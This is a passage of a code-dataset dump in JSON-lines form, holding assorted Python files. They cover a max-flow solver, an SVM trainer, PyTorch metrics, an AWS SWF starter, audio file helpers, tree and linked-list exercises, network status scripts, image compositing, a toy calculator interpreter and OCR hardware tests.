nodes\n unique_nodes = set(start_nodes + end_nodes)\n node_map = dict((v, i) for i, v in enumerate(unique_nodes))\n node_inv_map = dict((i, k) for k, i in node_map.items())\n start_nodes = [node_map[n] for n in start_nodes]\n end_nodes = [node_map[n] for n in end_nodes]\n source_node = node_map[source_node]\n sink_node = node_map[sink_node]\n\n # Optimize\n max_flow = SimpleMaxFlow()\n max_flow.add_arcs_with_capacity(start_nodes, end_nodes, capacities)\n solved = max_flow.solve(source_node, sink_node)\n\n # Results\n status = 'success'\n message = None\n data = None\n if solved == max_flow.OPTIMAL:\n message = 'Optimal solution found successfully!'\n data = {}\n data['optimalFlow'] = max_flow.optimal_flow()\n data['sourceMinCut'] = [node_inv_map[i]\n for i in max_flow.get_source_side_min_cut()]\n data['sinkMinCut'] = [node_inv_map[i]\n for i in max_flow.get_sink_side_min_cut()]\n data['arcs'] = []\n for i in range(max_flow.num_arcs()):\n data['arcs'].append({\n 'startNodeId': node_inv_map[max_flow.tail(i)],\n 'endNodeId': node_inv_map[max_flow.head(i)],\n 'flow': max_flow.flow(i),\n 'capacity': max_flow.capacity(i)\n })\n else:\n message = 'No solution found'\n\n return {'status': status, 'message': message, 'data': data}, 200\n","sub_path":"functions/maximum_flows/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443188743","text":"import csv\nimport os\nimport numpy as np\nimport json\n\n#reference taken from implementation on site https://github.com/llSourcell/Classifying_Data_Using_a_Support_Vector_Machine/blob/master/support_vector_machine_lesson.ipynb\n\ndef SVM(x, y,learning_rate,epochs):\n print(learning_rate,epochs)\n w = np.zeros(len(x[0]))\n b = 0\n # learning_rate = 0.001\n\n\n # epochs = 100000\n # epochs = 5000\n errors = []\n epoch_list = []\n\n for epoch in range(1, epochs):\n # print(epoch)\n error_count = 0\n for i in range(len(x)):\n if (y[i] * (np.dot(w, x[i]) + b) < 1):\n w = w - learning_rate * (((1 / epoch) * w) - (y[i] * x[i]))\n b = b - learning_rate * (-1 * y[i])\n error_count += 1\n else:\n w = w - learning_rate * ((1 / epoch) * w)\n\n # w=w_new\n errors.append(error_count)\n epoch_list.append(epoch)\n\n return (w, b)\n\n\ndef test(w, x, y, b):\n error_count = 0\n ctr = 0\n for i in range(len(x)):\n ctr += 1\n # print(np.dot(w, x[i]) + b, y[i])\n if (np.sign(y[i]) != np.sign(np.dot(w, x[i]) + b)):\n error_count += 1\n\n # print(error_count)\n return (ctr - error_count) / ctr\n\nlabel_path = \"E:\\ASU\\Sem 2\\SML\\Project\\Data\"\nfnames=[\"Train_Labels_10000_HU_HIST.csv\",\"Train_Labels_10000_FLAT_GRAY.csv\",\"Train_Labels_10000_KAZE.csv\"]\ndata = []\n# fname=\"Train_Labels_10000_HU_HIST.csv\"\n# fname1=\"Train_Labels_10000_BLUR_HU_HIST.csv\"\nfor fname in fnames:\n\n data=[]\n with open(os.path.join(label_path, fname)) as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n for i in range(len(row)):\n if (i > 0):\n row[i] = float(row[i])\n data.append(row)\n\n X = np.zeros([len(data), len(data[0]) - 2])\n Y = np.zeros(len(data))\n for i in range(len(data)):\n X[i] = np.asarray(data[i][1:-1])\n Y[i] = data[i][-1]\n # print(X[i],Y[i])\n\n\n Xtrain = X[:9000]\n Xtest = X[9000:]\n Ytrain = Y[:9000]\n Ytest = Y[9000:]\n\n\n epochs_list=[100,200,500,1000,5000,10000]\n learning_rate_list=[0.001,0.005,0.01,0.05,0.1,0.5]\n\n results={}\n\n ctr=0\n for i in learning_rate_list:\n results[i]={}\n for j in epochs_list:\n ctr+=1\n print(fname)\n w_b = SVM(Xtrain, Ytrain,i,j)\n results[i][j] = test(w_b[0], Xtest, Ytest, w_b[1])\n # results[i][j] = test(w_b[0], Xtrain, Ytrain, w_b[1])\n print(results[i][j])\n # if(ctr==2):\n # break\n # break\n print()\n # print(results)\n\n temp_fname = fname.split(\".\")[0]\n store_fname = temp_fname+\"_TRAIN.json\"\n with open(os.path.join(label_path,store_fname),\"w\") as json_file:\n json.dump(results,json_file)\n # break","sub_path":"SVM Gradient Descent/SVM_Gradient_Descent.py","file_name":"SVM_Gradient_Descent.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443709664","text":"# :: dhruv :: #\n\n\nimport torch\n\ndef accuracy(pred, gt):\n with torch.no_grad():\n best_pred = torch.argmax(pred, dim=1)\n \n assert best_pred.shape[0] == len(gt)\n correct = 0\n correct += torch.sum(best_pred == gt).item()\n\n return correct / len(gt)\n\n\ndef top_k_acc(pred, gt, k=3):\n with torch.no_grad():\n best_pred = torch.topk(pred, k, dim=1)[1]\n assert best_pred.shape[0] == len(gt)\n correct = 0\n for i in range(k):\n correct += torch.sum(best_pred[:,i] == gt).item()\n\n return correct / len(gt)\n\n","sub_path":"model/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141270656","text":"import os\n# Add parent directory for imports\nparentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nos.sys.path.insert(0, parentdir)\n\nimport boto.swf\nimport json\nfrom optparse import OptionParser\nfrom S3utility.s3_notification_info import S3NotificationInfo\nimport starter_helper as helper\nfrom starter_helper import NullRequiredDataException\n\n\"\"\"\nAmazon SWF SilentCorrectionsIngest starter, preparing article xml for lax.\n\"\"\"\n\n\nclass starter_SilentCorrectionsIngest():\n def __init__(self):\n self.const_name = \"SilentCorrectionsIngest\"\n\n def start(self, settings, info=None, run=None):\n\n # Log\n logger = helper.get_starter_logger(settings.setLevel, helper.get_starter_identity(self.const_name))\n\n if hasattr(info, 'file_name') == False or info.file_name is None:\n raise NullRequiredDataException(\"filename is Null / Did not get a filename.\")\n\n input = S3NotificationInfo.to_dict(info)\n input['run'] = run\n input['version_lookup_function'] = \"article_highest_version\"\n input['force'] = True\n\n workflow_id, \\\n workflow_name, \\\n workflow_version, \\\n child_policy, \\\n execution_start_to_close_timeout, \\\n workflow_input = helper.set_workflow_information(self.const_name, \"1\", None, input,\n info.file_name.replace('/', '_'))\n\n # Simple connect\n conn = boto.swf.layer1.Layer1(settings.aws_access_key_id, settings.aws_secret_access_key)\n\n try:\n response = conn.start_workflow_execution(settings.domain, workflow_id, workflow_name, workflow_version,\n settings.default_task_list, child_policy,\n execution_start_to_close_timeout, workflow_input)\n\n logger.info('got response: \\n%s' % json.dumps(response, sort_keys=True, indent=4))\n\n except NullRequiredDataException as e:\n logger.exception(e.message)\n raise\n\n except boto.swf.exceptions.SWFWorkflowExecutionAlreadyStartedError:\n # There is already a running workflow with that ID, cannot start another\n message = 'SWFWorkflowExecutionAlreadyStartedError: There is already a running workflow with ID %s' % workflow_id\n logger.info(message)\n\n\nif __name__ == \"__main__\":\n\n doi_id = None\n\n # Add options\n parser = OptionParser()\n parser.add_option(\"-e\", \"--env\", default=\"dev\", action=\"store\", type=\"string\", dest=\"env\",\n help=\"set the environment to run, either dev or live\")\n parser.add_option(\"-f\", \"--filename\", default=None, action=\"store\", type=\"string\", dest=\"filename\",\n help=\"specify the DOI id the article to process\")\n\n (options, args) = parser.parse_args()\n if options.env:\n ENV = options.env\n if options.filename:\n filename = options.filename\n\n import settings as settingsLib\n settings = settingsLib.get_settings(ENV)\n\n o = starter_SilentCorrectionsIngest()\n\n o.start(settings=settings,)\n","sub_path":"starter/starter_SilentCorrectionsIngest.py","file_name":"starter_SilentCorrectionsIngest.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483175521","text":"import sys\nimport os\nimport glob\nimport re\nimport scipy.io.wavfile as wf\nimport numpy as np\n\nfrom .default_constants import *\nfrom .helper_functions import *\n\ndef decompose_path(path):\n 'path を (directory, stem, extension) に分解'\n directory, base_name = os.path.split(path)\n stem, extension = os.path.splitext(base_name)\n return (directory, stem, extension)\n\ndef compose_path(directory, stem, extension):\n '(directory, stem, extension) からパスを合成'\n return os.path.join(directory, stem + extension)\n\ndef make_directory_exist(path):\n '''\n 指定パスのディレクトリが存在しなければ作成する。\n ファイルパスを渡すこともできる\n '''\n if len(path) == 0:\n return\n if not os.path.isdir(path):\n directory, _, _ = decompose_path(path)\n if directory == '':\n return\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef detect_stem_tail_number(stem):\n '''\n ファイル名のステム末尾についている番号を検出する。\n 見つからなかった場合は 0 を返す。\n '''\n m = re.match('^(.+?)(\\\\d+)$', stem)\n if m is None:\n return 0\n groups = m.groups()\n if len(groups) == 1:\n return 0\n else:\n return int(groups[1])\n\ndef pad_stem_zero(stem, number_of_digit):\n '''\n ファイル名のステム stem の末尾に付いている番号を digit 桁にゼロパディングする。\n 末尾に番号の付いていないステムが与えられた場合は入力をそのまま返す。\n '''\n m = re.match('^(.+?)(\\\\d+)$', stem)\n if m is None:\n return stem\n groups = m.groups()\n if len(groups) == 1:\n return stem\n else:\n return groups[0] + groups[1].zfill(number_of_digit)\n\ndef load_samples(samples_path, internal_sample_format):\n '''\n wav ファイルからサンプル列をロードする\n '''\n # 存在チェック\n if not os.path.exists(samples_path):\n raise Exception('Specified file \"%s\" has not existed.' % samples_path)\n # ロード\n sample_rate, input_samples = wf.read(samples_path)\n # フォーマットを指定のものに変換する\n if internal_sample_format == 'float64':\n converted_samples = input_samples.astype(np.float64)\n elif internal_sample_format == 'float32':\n converted_samples = input_samples.astype(np.float32)\n elif internal_sample_format == 'int32':\n converted_samples = input_samples.astype(np.int32)\n elif internal_sample_format == 'int16':\n converted_samples = input_samples.astype(np.int16)\n else:\n raise RuntimeError('Invalid data type string : ' + internal_sample_format)\n return converted_samples, sample_rate\n\ndef save_samples(samples_path, samples, samplerate, export_sample_format):\n '''\n wav ファイルにサンプル列をセーブする\n '''\n make_directory_exist(samples_path)\n # フォーマットを指定のものに変換する\n if export_sample_format == 'float32':\n converted_samples = samples.astype(np.float32)\n elif export_sample_format == 'int32':\n converted_samples = samples.astype(np.int32)\n elif export_sample_format == 'int16':\n converted_samples = samples.astype(np.int16)\n else:\n raise RuntimeError('Invalid data type string : ' + export_sample_format)\n wf.write(samples_path, samplerate, converted_samples)\n\ndef find_wav_files(dir_path):\n '''\n 指定ディレクトリ内の wav ファイルを検索する。\n '''\n # 指定ディレクトリ中の wav ファイルを列挙\n wav_files = glob.glob(os.path.join(dir_path, '*.wav'))\n if len(wav_files) == 0:\n print('No wav file in directory \"%s\".' % dir_path)\n return None\n # ファイルステム末尾の番号でソート\n sorted_wav_files = sorted(wav_files, key=lambda path: detect_stem_tail_number(decompose_path(path)[1]))\n # 正常終了\n return sorted_wav_files\n\ndef find_ini_file(dir_path):\n '''\n 指定ディレクトリ内の ini ファイルを検索する。\n '''\n # 指定ディレクトリ中の ini ファイルを列挙\n ini_files = glob.glob(os.path.join(dir_path, '*.ini'))\n if len(ini_files) == 0:\n print('No ini files in directory \"%s\".' % dir_path)\n return None\n elif 1 < len(ini_files):\n print('Too many ini files in directory \"%s\".' % dir_path)\n return None\n # 正常終了\n return ini_files[0]\n\ndef load_wav_files(wav_files_path, internal_sample_format):\n '''\n 指定ファイル全てをメモリ上にロード\n '''\n samplerate = 0\n samples_list = []\n for p in wav_files_path:\n # ロード\n try:\n temp_input, temp_sampletate = load_samples(p, INTERNAL_SAMPLE_FORMAT)\n except Exception as err:\n print(err)\n raise\n # サンプルレートをチェック\n if samplerate == 0:\n samplerate = temp_sampletate\n elif samplerate != temp_sampletate:\n print('Wrong sample rate is detected in input files.')\n print('File = ' + p)\n print('Expected sample rate = ' + samplerate)\n print('Actual sample rate = ' + temp_sampletate)\n exit(1)\n # 無音サンプルはスキップ\n if is_slient_samples(temp_input):\n continue\n # ロードした波形をリストに追加\n samples_list.append({'stereo': temp_input, 'path': p})\n # 正常終了\n return samples_list, samplerate\n","sub_path":"nupan_offline_audio_tools/details/file_functions.py","file_name":"file_functions.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"94929736","text":"\"\"\"\nQ6:\n\nImplement long paths, which returns a list of all paths in a tree with length at least\nn. A path in a tree is a linked list of node values that starts with the root and ends\nat a leaf. Each subsequent element must be from a child of the previous value’s\nnode. The length of a path is the number of edges in the path (i.e. one less than\nthe number of nodes in the path). Paths are listed in order from left to right. See\nthe doctests for some examples.\n\"\"\"\n\ndef long_paths(tree, n):\n \"\"\"Return a list of all paths in tree with length at least n.\n >>> t = Tree(3, [Tree(4), Tree(4), Tree(5)])\n >>> left = Tree(1, [Tree(2), t])\n >>> mid = Tree(6, [Tree(7, [Tree(8)]), Tree(9)])\n >>> right = Tree(11, [Tree(12, [Tree(13, [Tree(14)])])])\n >>> whole = Tree(0, [left, Tree(13), mid, right])\n >>> for path in long_paths(whole, 2):\n ... print(path)\n ...\n <0 1 2>\n <0 1 3 4>\n <0 1 3 4>\n <0 1 3 5>\n <0 6 7 8>\n <0 6 9>\n <0 11 12 13 14>\n >>> for path in long_paths(whole, 3):\n ... print(path)\n ...\n <0 1 3 4>\n <0 1 3 4>\n <0 1 3 5>\n <0 6 7 8>\n <0 11 12 13 14>\n >>> long_paths(whole, 4)\n [Link(0, Link(11, Link(12, Link(13, Link(14)))))]\n \"\"\"\n paths = []\n if n <= 0 and tree.is_leaf():\n paths.append(Link(tree.label))\n for b in tree.branches:\n for path in long_paths(b, n - 1):\n paths.append(Link(tree.label, path))\n return paths\n\n# Link Class\n\nclass Link:\n empty = ()\n def __init__(self, first, rest=empty):\n assert rest is Link.empty or isinstance(rest, Link)\n self.first = first\n self.rest = rest\n\n def __repr__(self):\n if self.rest:\n rest_str = ', ' + repr(self.rest)\n else:\n rest_str = ''\n return 'Link({0}{1})'.format(repr(self.first), rest_str)\n\n def __str__(self):\n string = '<'\n while self.rest is not Link.empty:\n string += str(self.first) + ' '\n self = self.rest\n return string + str(self.first) + '>'\n\n# Tree Class\n\nclass Tree:\n def __init__(self, label, branches=[]):\n for b in branches:\n assert isinstance(b, Tree)\n self.label = label\n self.branches = branches\n\n def is_leaf(self):\n return not self.branches\n\n def __repr__(self):\n if self.branches:\n branches_str = ', ' + repr(self.branches)\n else:\n branches_str = ''\n return 'Tree({0}{1})'.format(self.label, branches_str)\n","sub_path":"assets/code/sol6.py","file_name":"sol6.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19696622","text":"import psutil\nfrom prettytable import PrettyTable\nimport netifaces\n\ndef test():\n print (psutil.net_io_counters(pernic=True))\n\ndef proc_redes():\n pro_table = PrettyTable(['Endereço', 'Mascara', 'Gateway'])\n for i in netifaces.interfaces():\n try:\n pro_table.add_row([\n netifaces.ifaddresses(i)[netifaces.AF_INET][0]['addr'],\n netifaces.ifaddresses(i)[netifaces.AF_INET][0]['netmask'],\n netifaces.gateways()['default'][netifaces.AF_INET][0],\n\n ])\n\n except Exception as e:\n pass\n print(pro_table)\n\n\ndef conexao():\n table = PrettyTable(['Conexão', 'Status', 'Velocidade'])\n for key in psutil.net_if_stats().keys():\n name = key\n up = \"Up\" if psutil.net_if_stats()[key].isup else \"Down\"\n speed = psutil.net_if_stats()[key].speed\n table.add_row([name, up, speed])\n print(table)\n\n\ndef processos():\n process_table = PrettyTable(['PID', 'PNAME', 'STATUS', 'NUM THREADS'])\n for process in psutil.pids()[-10:]:\n try:\n p = psutil.Process(process)\n process_table.add_row([\n str(process),\n p.name(),\n p.status(),\n p.num_threads()\n ])\n\n except Exception as e:\n pass\n print(process_table)\n\nprint(\"----Procesos de rede----\")\nproc_redes()\nprint(\"----Conexão----\")\nconexao()\nprint(\"----Processos----\")\nprocessos()\nprint(\"----Todos os processos na máquina----\")\ntest()","sub_path":"dados/redes.py","file_name":"redes.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22828763","text":"def growingPlant(upSpeed, downSpeed, desiredHeight):\n \"\"\"Each day a plant is growing by upSpeed meters. Each night that plant's \n height decreases by downSpeed meters due to the lack of sun heat. Initially,\n plant is 0 meters tall. We plant the seed at the beginning of a day. We want\n to know when the height of the plant will reach a certain level.\"\"\"\n\n height = 0\n days = 0\n \n \n while True:\n days += 1\n height += upSpeed\n \n if height >= desiredHeight:\n return days\n else:\n height -= downSpeed","sub_path":"growing-plant.py","file_name":"growing-plant.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163102849","text":"import cv2\nimport os\nimport os.path as osp\nimport numpy as np\nimport random\nfrom process import black_process_two\n\n\ndef mix_two_images(base, img2):\n\troi = base[55:335, 145:545]\n\t# roi = base[43:421, 139:525]\n\t# 将img2处理后的pre2上的物体抠出来放在img1处理后的base处理后的图上\n\t# img2 = img2[43:421, 139:525]\n\timg2 = cv2.resize(img2, (400, 280))\n\tmask, pre2 = black_process_two(img2)\n\t# cv2.imshow('mask', mask)\n\n\tmask_inv = cv2.bitwise_not(mask)\n\n\t# mask 为掩码,与原图作用时,mask=0的地方原图变为黑色,其他地方不变\n\timg1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\n\t# cv2.imshow('img1_bg', img1_bg)\n\timg2_bg = cv2.bitwise_and(pre2, pre2, mask=mask)\n\n\tdst = cv2.add(img1_bg, img2_bg)\n\tbase[55:335, 145:545] = dst\n\n\treturn base \n\n\n# 物体总数\nN = random.randint(2, 4) \nn = random.randint(4, 10)\npath = '/home/guo/project/camera_process/combine/Images3/Before/'\n\n# 从路径中随机选择N个文件夹(即N个物体)每个文件夹中随机选择一张图片\nall_file = random.sample(os.listdir(path), N)\n# image_list = [osp.join(i, random.choice(os.listdir(osp.join(path, i)))) for i in all_file]\nimage_list = [osp.join(i, j) for i in all_file for j in random.sample(os.listdir(osp.join(path, i)), n) ]\n\n# img1 = cv2.imread(osp.join(path, image_list[0]))\nbase = cv2.imread('back.jpg')\n# _, base = black_process_two(img1)\n\nfor i in random.sample(image_list, random.randint(1, 8)):\n\timg = osp.join(path, i)\n\timg = cv2.imread(img)\n\tbase = mix_two_images(base, img)\n\n\ncv2.imshow('mask', base)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"抠图/combination_light.py","file_name":"combination_light.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"61025114","text":"# Token types\n#\n# EOF (end-of-file) token is used to indicate that\n# there is no more input left for lexical analysis\nINTEGER, PLUS, EOF, WS, MINUS = 'INTEGER', 'PLUS', 'EOF', 'WHITESPACE', 'MINUS'\n\n\n#DEBUG FLAG\nDEBUG = False\n\n\nclass Token(object):\n def __init__(self, type, value):\n # token type: INTEGER, PLUS, or EOF\n self.type = type\n # token value: 0, 1, 2. 3, 4, 5, 6, 7, 8, 9, '+', '-', ' ', or None\n self.value = value\n\n def __str__(self):\n \"\"\"String representation of the class instance.\n\n Examples:\n Token(INTEGER, 3)\n Token(PLUS '+')\n \"\"\"\n return 'Token({type}, {value})'.format(\n type=self.type,\n value=repr(self.value)\n )\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Interpreter(object):\n def __init__(self, text):\n # client string input, e.g. \"3+5\"\n self.text = text\n # self.pos is an index into self.text\n self.pos = 0\n # current token instance\n self.current_token = None\n\n\n def error(self):\n raise Exception('Error parsing input')\n\n def get_next_token(self):\n \"\"\"Lexical analyzer (also known as scanner or tokenizer)\n\n This method is responsible for breaking a sentence\n apart into tokens. One token at a time.\n \"\"\"\n text = self.text\n\n # is self.pos index past the end of the self.text ?\n # if so, then return EOF token because there is no more\n # input left to convert into tokens\n if self.pos > len(text) - 1:\n return Token(EOF, None)\n\n # get a character at the position self.pos and decide\n # what token to create based on the single character\n current_char = text[self.pos]\n\n # if the character is a digit then convert it to\n # integer, create an INTEGER token, increment self.pos\n # index to point to the next character after the digit,\n # and return the INTEGER token\n if current_char.isdigit():\n token = Token(INTEGER, int(current_char))\n self.pos += 1\n return token\n\n if current_char == '+':\n token = Token(PLUS, current_char)\n self.pos += 1\n return token\n if current_char == '-':\n token = Token(MINUS, current_char)\n self.pos += 1\n return token\n if current_char == ' ':\n token = Token(WS, current_char)\n self.pos += 1\n return token\n\n self.error()\n\n def eat(self, token_type):\n # compare the current token type with the passed token\n # type and if they match then \"eat\" the current token\n # and assign the next token to the self.current_token,\n # otherwise raise an exception.\n if self.current_token.type == token_type:\n self.current_token = self.get_next_token()\n return True\n else:\n # self.error()\n return False\n\n def expr(self):\n \"\"\"expr -> INTEGER PLUS INTEGER\"\"\"\n\n # set current token to the first token taken from the input\n self.current_token = self.get_next_token() \n\n # skip whitespace\n self.skip_whitespace()\n \n # we expect the current token to be an integer\n left = self.get_operand()\n\n # skip whitespace\n self.skip_whitespace()\n\n # we expect the current token to be a '+' token\n op = self.current_token\n self.check_operator()\n\n # skip whitespace\n self.skip_whitespace()\n\n # we expect the current token to be an integer\n right = self.get_operand()\n\n # after the above call the self.current_token is set to\n # EOF token\n\n # at this point INTEGER PLUS INTEGER sequence of tokens\n # has been successfully found and the method can just\n # return the result of adding two integers, thus\n # effectively interpreting client input\n result = self.perform_op(left, right, op)\n return result\n\n\n def get_operand(self):\n \"\"\"Get an integer operand. Returns a token\"\"\"\n # first token must be an integer\n if self.current_token.type != INTEGER:\n self.error()\n\n prev_token = self.current_token\n res = Token(INTEGER, 0)\n # Keep eating until you get to a non-integer token\n while(self.eat(INTEGER)):\n # update the value by multiplying current value by 10 and then adding the value of the previous token\n res.value = 10 * res.value + prev_token.value\n prev_token = self.current_token\n return res\n\n def check_operator(self):\n \"\"\"Get an arithmetic operator. Returns a token\"\"\"\n if self.eat(PLUS) or self.eat(MINUS):\n pass\n else:\n # if not + or - then return error\n self.error()\n\n def perform_op(self, left, right, op):\n if op.type == PLUS:\n return left.value + right.value\n elif op.type == MINUS:\n return left.value - right.value\n else:\n self.error()\n\n def skip_whitespace(self):\n \"\"\" Skips Whitespace \"\"\"\n while self.eat(WS):\n pass\n\n\ndef test_get_operand():\n interp = Interpreter(\"12+5\")\n exp = 12\n interp.current_token = interp.get_next_token()\n res = interp.get_operand().value\n print(\"exp:\", exp, \"res:\", res)\n assert exp == res\n interp = Interpreter(\"1234+5\")\n exp = 1234\n interp.current_token = interp.get_next_token()\n res = interp.get_operand().value\n print(\"exp:\", exp, \"res:\", res)\n assert exp == res\n interp = Interpreter(\"+5\")\n try:\n interp.current_token = interp.get_next_token()\n res = interp.get_operand().value\n except Exception:\n print(\"Caught Exception\")\n\ndef test():\n test_get_operand()\n\n\n\ndef main():\n if DEBUG:\n test()\n else:\n while True:\n try:\n try:\n text = input('calc> ')\n except NameError: # Python3\n text = input('calc> ')\n except EOFError:\n break\n if not text:\n continue\n interpreter = Interpreter(text)\n result = interpreter.expr()\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"part1/calc1-1.py","file_name":"calc1-1.py","file_ext":"py","file_size_in_byte":6372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592079444","text":"# Copyright (c) 2018, TU Kaiserslautern\n# Copyright (c) 2018, Xilinx, Inc.\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without \n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, \n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright \n# notice, this list of conditions and the following disclaimer in the \n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its \n# contributors may be used to endorse or promote products derived from \n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, \n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR \n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR \n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, \n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, \n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, \n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR \n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF \n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport os\nimport rnn\nimport pytest\nimport numpy as np\nfrom PIL import Image\n\ndef test_plain_ocr():\n precisions = [\"W2A2\", \"W4A8\"]\n test_dir = os.path.dirname(os.path.realpath(__file__))\n for precision in precisions:\n hw_ocr = rnn.PynqPlainOCR(runtime=rnn.RUNTIME_HW, precision=precision)\n im = Image.open(os.path.join(test_dir, 'Test_images', 'plain', precision, '010077.bin.png'))\n with open(os.path.join(test_dir, 'Test_images', 'plain', precision, 'test_image_gt.txt'), 'r') as f:\n print(\"Prec = {}\".format(precision)) \n gt = f.read().replace('\\n', '')\n hw_result = hw_ocr.inference(im)\n _, _, hw_recognized_text = hw_result\n hw_ocr.cleanup()\n print(\"Label = {}\".format(gt))\n print(\"Pred = {}\\n\".format(hw_recognized_text))\n assert gt == hw_recognized_text\n\ndef test_seq_mnist_ocr():\n network = \"bigru\"\n precisions = [\"W2A2\", \"W4A4\", \"W8A8\"]\n test_dir = os.path.dirname(os.path.realpath(__file__))\n for precision in precisions:\n hw_ocr = rnn.PynqSeqMnistOCR(runtime=rnn.RUNTIME_HW, network=network, precision=precision)\n # uncomment this if using uni birectional rnn\n # hw_ocr.bidirectional_enabled = False\n im = Image.open(os.path.join(test_dir, 'Test_images', 'seq_mnist', precision, 'test_image.png'))\n with open(os.path.join(test_dir, 'Test_images', 'seq_mnist', precision, 'test_image_gt.txt'), 'r') as f:\n print(\"Prec = {}\".format(precision))\n gt = f.read().replace('\\n', '')\n hw_result = hw_ocr.inference(im)\n _, _, hw_recognized_text = hw_result\n hw_ocr.cleanup()\n print(\"Label = {}\".format(gt))\n print(\"Pred = {}\\n\".format(hw_recognized_text))\n assert gt == hw_recognized_text\n\nif __name__ == '__main__':\n test_seq_mnist_ocr()\n","sub_path":"tests/test_ocr.py","file_name":"test_ocr.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522871687","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 1 11:32:26 2019\r\n\r\n@author: vmpsk\r\n\"\"\"\r\n\r\n\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nfrom shutil import copyfile\r\nfrom pathlib import Path\r\nimport numpy as np\r\nfrom tkinter import Tk\r\n\r\nimport os\r\nimport tkinter\r\nimport PIL.Image, PIL.ImageTk\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom tkinter.filedialog import askdirectory\r\n\r\nimport numpy as np\r\nimport random\r\nimport math\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport datetime\r\nfrom copy import copy, deepcopy\r\nfrom numpy import unravel_index\r\nfrom IPython import get_ipython\r\nimport cmath\r\n\r\npi = 3.141592\r\n##----Generate array of float values-------------------------------------------\r\ndef frange(start, stop, step):\r\n arr = []\r\n i = start\r\n while i < stop:\r\n arr.append(i)\r\n i += step\r\n arr.append(i) \r\n return(arr) \r\n\r\n##----Import data from file as 2D matrix---------------------------------------\r\ndef MatrixImport(Fileloc): \r\n moment_stringlist = []\r\n with open(Fileloc) as f:\r\n for line in f: # \\\r\n moment_stringlist.append(line)\r\n \r\n moment = [] # Moment string list to magnetic moment matrix\r\n for line in moment_stringlist:\r\n moment = moment + line.strip( '\\n' ).split(' ') \r\n \r\n xx = len(moment_stringlist)\r\n yy = len(moment_stringlist)\r\n moment = np.reshape(moment, (xx, yy)).astype(np.float)\r\n return(moment)\r\n#\r\n#class App(object):\r\n# def __init__(self, window, window_title):#, image_path=(foldername+'.png')):\r\n# self.window = window\r\n# self.window.title(window_title) \r\n# #-------Frames and grid----------------\r\n# self.frame = tkinter.Frame(window)\r\n# self.frame.grid(row=0,column=0, sticky=tkinter.N) \r\n# #========Buttons=======================\r\n# self.btn_Read_path1 = tkinter.Button(self.frame, text=\"Vertex Stat file select\", width=25, command=self.Read_path1) # Button that lets the user to draw grid \r\n# self.btn_Read_path1.grid(row=0,column=0) #self.btn_blur.pack(anchor=tkinter.CENTER, expand=True)\r\n## self.btn_Read_path2 = tkinter.Button(self.frame, text=\"Save Result\", width=25, command=self.Read_path2) # Button that lets the user to draw grid \r\n## self.btn_Read_path2.grid(row=1,column=0) #self.btn_blur.pack(anchor=tkinter.CENTER, expand=True) \r\n## self.btn_Read_path3 = tkinter.Button(self.frame, text=\"Read parameters\", width=20, command=self.Read_paramters) # Button that lets the user to draw grid \r\n## self.btn_Read_path3.grid(row=2,column=0) 